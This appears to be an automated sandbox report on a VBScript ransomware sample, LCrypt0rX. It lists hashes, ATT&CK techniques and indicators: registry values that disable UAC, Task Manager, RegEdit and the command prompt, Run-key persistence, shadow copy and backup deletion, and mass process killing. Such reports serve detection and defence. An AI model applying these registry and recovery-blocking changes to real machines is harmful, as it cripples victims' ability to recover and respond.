d89f8d317cf5f8600cc5abe52846f38bf191ecbfb841817696d89d59dbca03c1

Analysis

max time kernel
103s
max time network
256s
platform
windows7_x64
resource
win7-20241010-en
resource tags

arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
submitted
01-11-2024 08:37

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Ransom.Win32.LCrypt0rX.A/LCrypt0rX.vbs
Size

21KB
MD5

39be1e0cf0a4887481f3214a5b7106c3
SHA1

2a7dd94edff0e98df02c4d3855c18888d6e12ee8
SHA256

c35ad4c7258f0246390c69160d7f3cf3c2f3d6bfe644370e7c1854be43ce620f
SHA512

317ced51dc5f552dba26aa1c26fe1e74e415966172cbbd1cc9fc20d368382a97535c72a146c09cf6bc0a0d89a7c9c593bb2ffb3fc427889eae4965a6a5f42c21
SSDEEP

384:tpGbplStxYHQHSH7l+ivHVn2jvVQayWwA+sxQ+E6O:shR23Y+EF

Score

10^/10

defense_evasion discovery evasion execution impact persistence ransomware trojan

Malware Config

Signatures

UAC bypass 3 TTPs 2 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	wscript.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	wscript.exe

Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047

Blocklisted process makes network request 3 IoCs

flow	pid	Process
3	572	wscript.exe
5	572	wscript.exe
7	572	wscript.exe

Blocks application from running via registry modification 4 IoCs

Adds application to list of disallowed applications.

evasion

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	wscript.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun	wscript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\1 = "msconfig.exe"	wscript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\2 = "Autoruns.exe"	wscript.exe

Deletes backup catalog 3 TTPs 1 IoCs

Uses wbadmin.exe to inhibit system recovery.

ransomware

Command and Scripting Interpreter

T1059

File Deletion

T1070.004

Inhibit System Recovery

T1490

pid	Process
676	wbadmin.exe

Disables RegEdit via registry modification 1 IoCs

evasion

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	wscript.exe

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MyStartupScript = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Ransom.Win32.LCrypt0rX.A\\LCrypt0rX.vbs"	wscript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\iamthedoom = "C:\\Windows\\System32\\iamthedoom.bat"	wscript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SpamScript = "C:\\Windows\\System32\\haha.vbs"	wscript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Wins32BugFix = "C:\\Windows\\System32\\wins32bugfix.vbs"	wscript.exe

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	wscript.exe

Drops file in System32 directory 6 IoCs

description	ioc	Process
File created	C:\Windows\System32\wins32bugfix.vbs	wscript.exe
File opened for modification	C:\Windows\System32\wins32bugfix.vbs	wscript.exe
File created	C:\Windows\System32\iamthedoom.bat	wscript.exe
File opened for modification	C:\Windows\System32\iamthedoom.bat	wscript.exe
File created	C:\Windows\System32\haha.vbs	wscript.exe
File opened for modification	C:\Windows\System32\haha.vbs	wscript.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 15 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE

Interacts with shadow copies 3 TTPs 1 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1070.004

Inhibit System Recovery

T1490

Direct Volume Access

T1006

pid	Process
2980	vssadmin.exe

Kills process with taskkill 64 IoCs

evasion

pid	Process
2588	taskkill.exe
6612	taskkill.exe
13064	taskkill.exe
12548	taskkill.exe
6468	taskkill.exe
18124	taskkill.exe
5672	taskkill.exe
12804	taskkill.exe
6792	taskkill.exe
18744	taskkill.exe
10400	taskkill.exe
14660	taskkill.exe
6988	taskkill.exe
10056	taskkill.exe
15652	taskkill.exe
19844	taskkill.exe
15216	taskkill.exe
25100	taskkill.exe
2316	taskkill.exe
3276	taskkill.exe
8808	taskkill.exe
8536	taskkill.exe
15476	taskkill.exe
14260	taskkill.exe
13744	taskkill.exe
25884	taskkill.exe
8496	taskkill.exe
2996	taskkill.exe
10744	taskkill.exe
12864	taskkill.exe
19192	taskkill.exe
25640	taskkill.exe
12660	taskkill.exe
21476	taskkill.exe
18384	taskkill.exe
24668	taskkill.exe
17304	taskkill.exe
6168	taskkill.exe
6308	taskkill.exe
14068	taskkill.exe
14504	taskkill.exe
20972	taskkill.exe
4480	taskkill.exe
18848	taskkill.exe
4584	taskkill.exe
13528	taskkill.exe
14856	taskkill.exe
16060	taskkill.exe
15464	taskkill.exe
3552	taskkill.exe
6748	taskkill.exe
12836	taskkill.exe
14456	taskkill.exe
17588	taskkill.exe
26068	taskkill.exe
12644	taskkill.exe
21232	taskkill.exe
7908	taskkill.exe
10476	taskkill.exe
12084	taskkill.exe
16008	taskkill.exe
16372	taskkill.exe
3940	taskkill.exe
11492	taskkill.exe

Modifies Control Panel 1 IoCs

evasion

description	ioc	Process
Key created	\REGISTRY\MACHINE\Control Panel\Mouse	wscript.exe

Modifies Internet Explorer Phishing Filter 1 TTPs 2 IoCs

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\PhishingFilter	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\PhishingFilter\ClientSupported_MigrationTime = 20070fd03b2cdb01	iexplore.exe

Modifies Internet Explorer settings 1 TTPs 64 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\MINIE	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{EE3A81C1-982E-11EF-911E-C2ED954A0B9C} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff3d0000003d000000c3040000a2020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\DOMStorage\yahoo.com	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{EF053461-982E-11EF-911E-C2ED954A0B9C} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000004ecf3e4259aa05419b9c0951a15b13190000000002000000000010660000000100002000000053ba73980b8ba42076c85d93b42c36d6fcabb0c2aab0c8854dd1aa452d9f1485000000000e8000000002000020000000e92a3299c5ee22b86ec5c7bb51d290bbe285519451777faee86916df4d4c7c9b90000000900bc49eca1852aadfe5f125f90d1e7e9e0502724a1a2d929cd518be18a6b2ed5ca2114f0ab3cd30272bb1772c95b6036fe3d6fe4283746e81bbfa060ad99c3445e7e3008eec612da39d0d0958e29e376a820a7099031661503b69f04055d123f35ab185366e903a03e869beca66d1d513bfa36c67b02b1685b04948cdabddd684c7d81d666e270f4ed72173095b458e4000000073755036df5871faf02e28d0fab99e3947e815e5d3e66c4575e7a044b5064176a20539d9cf6b4dd9de6faaa078b358fdda5ba631ac32398f980fa6c496aa19c0	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

pid	Process
2728	notepad.exe

Script User-Agent 1 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	3	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious use of AdjustPrivilegeToken 21 IoCs

description	pid	Process
Token: SeBackupPrivilege	2900	vssvc.exe
Token: SeRestorePrivilege	2900	vssvc.exe
Token: SeAuditPrivilege	2900	vssvc.exe
Token: SeBackupPrivilege	1020	wbengine.exe
Token: SeRestorePrivilege	1020	wbengine.exe
Token: SeSecurityPrivilege	1020	wbengine.exe
Token: SeDebugPrivilege	2316	taskkill.exe
Token: SeDebugPrivilege	2588	taskkill.exe
Token: SeDebugPrivilege	3276	taskkill.exe
Token: SeDebugPrivilege	3676	taskkill.exe
Token: SeDebugPrivilege	1928	taskkill.exe
Token: SeDebugPrivilege	4584	taskkill.exe
Token: SeDebugPrivilege	4352	taskkill.exe
Token: SeDebugPrivilege	3552	taskkill.exe
Token: SeDebugPrivilege	6168	taskkill.exe
Token: SeDebugPrivilege	6308	taskkill.exe
Token: SeDebugPrivilege	6468	taskkill.exe
Token: SeDebugPrivilege	6612	taskkill.exe
Token: SeDebugPrivilege	6748	taskkill.exe
Token: SeDebugPrivilege	6916	taskkill.exe
Token: SeDebugPrivilege	7072	taskkill.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
532	iexplore.exe
532	iexplore.exe
2440	iexplore.exe
2440	iexplore.exe
2484	iexplore.exe
1692	iexplore.exe
2484	iexplore.exe
1692	iexplore.exe
532	iexplore.exe
532	iexplore.exe
532	iexplore.exe
532	iexplore.exe
2440	iexplore.exe
2440	iexplore.exe
2440	iexplore.exe
2440	iexplore.exe
1692	iexplore.exe
2440	iexplore.exe
532	iexplore.exe
1692	iexplore.exe
1692	iexplore.exe
2440	iexplore.exe
532	iexplore.exe
1692	iexplore.exe
1692	iexplore.exe
1692	iexplore.exe
1672	iexplore.exe
1672	iexplore.exe
2620	iexplore.exe
2620	iexplore.exe
2484	iexplore.exe
2484	iexplore.exe
2484	iexplore.exe
2484	iexplore.exe
1600	iexplore.exe
1600	iexplore.exe
2484	iexplore.exe
2484	iexplore.exe
1096	iexplore.exe
1096	iexplore.exe
2620	iexplore.exe
2620	iexplore.exe
2620	iexplore.exe
2620	iexplore.exe
2620	iexplore.exe
2620	iexplore.exe
2612	iexplore.exe
2612	iexplore.exe
2948	iexplore.exe
2948	iexplore.exe
1600	iexplore.exe
1600	iexplore.exe
1600	iexplore.exe
1600	iexplore.exe
1600	iexplore.exe
1600	iexplore.exe
1672	iexplore.exe
1672	iexplore.exe
1672	iexplore.exe
1672	iexplore.exe
1672	iexplore.exe
1672	iexplore.exe
1096	iexplore.exe
1096	iexplore.exe

Suspicious use of SetWindowsHookEx 62 IoCs

pid	Process
1692	iexplore.exe
1692	iexplore.exe
532	iexplore.exe
532	iexplore.exe
2944	iexplore.exe
2944	iexplore.exe
1672	iexplore.exe
1672	iexplore.exe
2620	iexplore.exe
2620	iexplore.exe
2484	iexplore.exe
2484	iexplore.exe
1600	iexplore.exe
1600	iexplore.exe
1676	iexplore.exe
1676	iexplore.exe
1316	iexplore.exe
2612	iexplore.exe
2948	iexplore.exe
2440	iexplore.exe
1316	iexplore.exe
2612	iexplore.exe
2948	iexplore.exe
2440	iexplore.exe
1096	iexplore.exe
1096	iexplore.exe
200	IEXPLORE.EXE
200	IEXPLORE.EXE
2384	iexplore.exe
2384	iexplore.exe
1832	iexplore.exe
1832	iexplore.exe
3216	IEXPLORE.EXE
3216	IEXPLORE.EXE
1324	IEXPLORE.EXE
2256	IEXPLORE.EXE
1324	IEXPLORE.EXE
2256	IEXPLORE.EXE
2820	IEXPLORE.EXE
2820	IEXPLORE.EXE
2880	IEXPLORE.EXE
2880	IEXPLORE.EXE
1520	IEXPLORE.EXE
1520	IEXPLORE.EXE
3244	IEXPLORE.EXE
3244	IEXPLORE.EXE
3236	IEXPLORE.EXE
3236	IEXPLORE.EXE
3200	IEXPLORE.EXE
3200	IEXPLORE.EXE
3608	IEXPLORE.EXE
3608	IEXPLORE.EXE
3644	IEXPLORE.EXE
3644	IEXPLORE.EXE
2984	IEXPLORE.EXE
2984	IEXPLORE.EXE
3208	IEXPLORE.EXE
3208	IEXPLORE.EXE
2820	IEXPLORE.EXE
2820	IEXPLORE.EXE
3228	IEXPLORE.EXE
3228	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2348 wrote to memory of 572	2348	WScript.exe	29
PID 2348 wrote to memory of 572	2348	WScript.exe	29
PID 2348 wrote to memory of 572	2348	WScript.exe	29
PID 572 wrote to memory of 2892	572	wscript.exe	30
PID 572 wrote to memory of 2892	572	wscript.exe	30
PID 572 wrote to memory of 2892	572	wscript.exe	30
PID 2892 wrote to memory of 2980	2892	cmd.exe	32
PID 2892 wrote to memory of 2980	2892	cmd.exe	32
PID 2892 wrote to memory of 2980	2892	cmd.exe	32
PID 572 wrote to memory of 2784	572	wscript.exe	35
PID 572 wrote to memory of 2784	572	wscript.exe	35
PID 572 wrote to memory of 2784	572	wscript.exe	35
PID 2784 wrote to memory of 676	2784	cmd.exe	37
PID 2784 wrote to memory of 676	2784	cmd.exe	37
PID 2784 wrote to memory of 676	2784	cmd.exe	37
PID 572 wrote to memory of 2728	572	wscript.exe	41
PID 572 wrote to memory of 2728	572	wscript.exe	41
PID 572 wrote to memory of 2728	572	wscript.exe	41
PID 572 wrote to memory of 2808	572	wscript.exe	43
PID 572 wrote to memory of 2808	572	wscript.exe	43
PID 572 wrote to memory of 2808	572	wscript.exe	43
PID 572 wrote to memory of 1508	572	wscript.exe	45
PID 572 wrote to memory of 1508	572	wscript.exe	45
PID 572 wrote to memory of 1508	572	wscript.exe	45
PID 572 wrote to memory of 2552	572	wscript.exe	46
PID 572 wrote to memory of 2552	572	wscript.exe	46
PID 572 wrote to memory of 2552	572	wscript.exe	46
PID 572 wrote to memory of 2316	572	wscript.exe	47
PID 572 wrote to memory of 2316	572	wscript.exe	47
PID 572 wrote to memory of 2316	572	wscript.exe	47
PID 2808 wrote to memory of 1692	2808	cmd.exe	49
PID 2808 wrote to memory of 1692	2808	cmd.exe	49
PID 2808 wrote to memory of 1692	2808	cmd.exe	49
PID 2808 wrote to memory of 2484	2808	cmd.exe	50
PID 2808 wrote to memory of 2484	2808	cmd.exe	50
PID 2808 wrote to memory of 2484	2808	cmd.exe	50
PID 2808 wrote to memory of 272	2808	cmd.exe	51
PID 2808 wrote to memory of 272	2808	cmd.exe	51
PID 2808 wrote to memory of 272	2808	cmd.exe	51
PID 2808 wrote to memory of 1672	2808	cmd.exe	52
PID 2808 wrote to memory of 1672	2808	cmd.exe	52
PID 2808 wrote to memory of 1672	2808	cmd.exe	52
PID 2808 wrote to memory of 1600	2808	cmd.exe	53
PID 2808 wrote to memory of 1600	2808	cmd.exe	53
PID 2808 wrote to memory of 1600	2808	cmd.exe	53
PID 1508 wrote to memory of 2688	1508	wscript.exe	54
PID 1508 wrote to memory of 2688	1508	wscript.exe	54
PID 1508 wrote to memory of 2688	1508	wscript.exe	54
PID 2808 wrote to memory of 1676	2808	cmd.exe	55
PID 2808 wrote to memory of 1676	2808	cmd.exe	55
PID 2808 wrote to memory of 1676	2808	cmd.exe	55
PID 2808 wrote to memory of 2620	2808	cmd.exe	56
PID 2808 wrote to memory of 2620	2808	cmd.exe	56
PID 2808 wrote to memory of 2620	2808	cmd.exe	56
PID 2808 wrote to memory of 532	2808	cmd.exe	57
PID 2808 wrote to memory of 532	2808	cmd.exe	57
PID 2808 wrote to memory of 532	2808	cmd.exe	57
PID 2808 wrote to memory of 2224	2808	cmd.exe	58
PID 2808 wrote to memory of 2224	2808	cmd.exe	58
PID 2808 wrote to memory of 2224	2808	cmd.exe	58
PID 2808 wrote to memory of 2944	2808	cmd.exe	59
PID 2808 wrote to memory of 2944	2808	cmd.exe	59
PID 2808 wrote to memory of 2944	2808	cmd.exe	59
PID 2552 wrote to memory of 2588	2552	wscript.exe	60

System policy modification 1 TTPs 16 IoCs

evasion

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	wscript.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun = "1"	wscript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\1 = "msconfig.exe"	wscript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\2 = "Autoruns.exe"	wscript.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisableCMD = "1"	wscript.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	wscript.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel = "1"	wscript.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	wscript.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System	wscript.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr = "1"	wscript.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun	wscript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer	wscript.exe
